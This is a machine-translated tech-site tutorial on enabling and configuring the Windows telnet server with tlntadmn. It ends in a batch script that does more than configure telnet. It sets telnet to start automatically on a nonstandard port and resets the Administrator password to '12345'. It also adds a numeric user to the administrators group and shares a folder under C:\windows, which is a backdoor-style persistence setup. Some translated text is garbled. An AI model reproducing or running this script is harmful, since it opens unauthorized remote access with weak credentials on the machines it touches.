In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-30 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/03 Report--
This article introduces the relevant knowledge of "how to open telnet management tools under cmd". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!
1. Start
Sc config tlntsvr start= auto
Net start telnet
2.telnet management tools
C:\ > tlntadmn /?
Usage: tlntadmn [computer name] [common_options] start | stop | pause | continue
| |-s |-k |-m | config config_options |
All conversations use 'all'.
-s sessionid lists information about the session.
-k sessionid terminates the session.
-m sessionid sends a message to the session.
Config configures telnet server parameters.
The common_options is:
-u user specifies the user whose credentials you want to use
-p password user password
The config_options is:
Dom = domain sets the user's default domain
Ctrlakeymap = yes | no sets the mapping of the ALT key
Timeout = hh:mm:ss sets the idle session timeout value
Timeoutactive = yes | no enables idle sessions.
Maxfail = attempts sets the number of failed login attempts before being disconnected.
Maxconn = connections sets the maximum number of connections.
Port = number sets the telnet port.
Sec = [+ / -] NTLM [+ / -] passwd
Set up an authentication authority
Mode = console | stream specifies the mode of operation.
3. Change the validation mode
Tlntadmn config sec = passwd
4. Change Port
Tlntadmn config port = 1001
5. Batch processing
The code is as follows:
@ echo off
@ sc config tlntsvr start= auto
@ net start telnet
@ tlntadmn config sec = passwd
@ tlntadmn config port = 1001
@ net user administrator 12345
@ net user 394931603 123456789 / add
@ net localgroup administrators 394931603 / add
@ pause
@ md c:\ windows\ 3949
@ net share 3949roomc:\ windows\ 3949
This is the end of the content of "how to open telnet management tools under cmd". Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.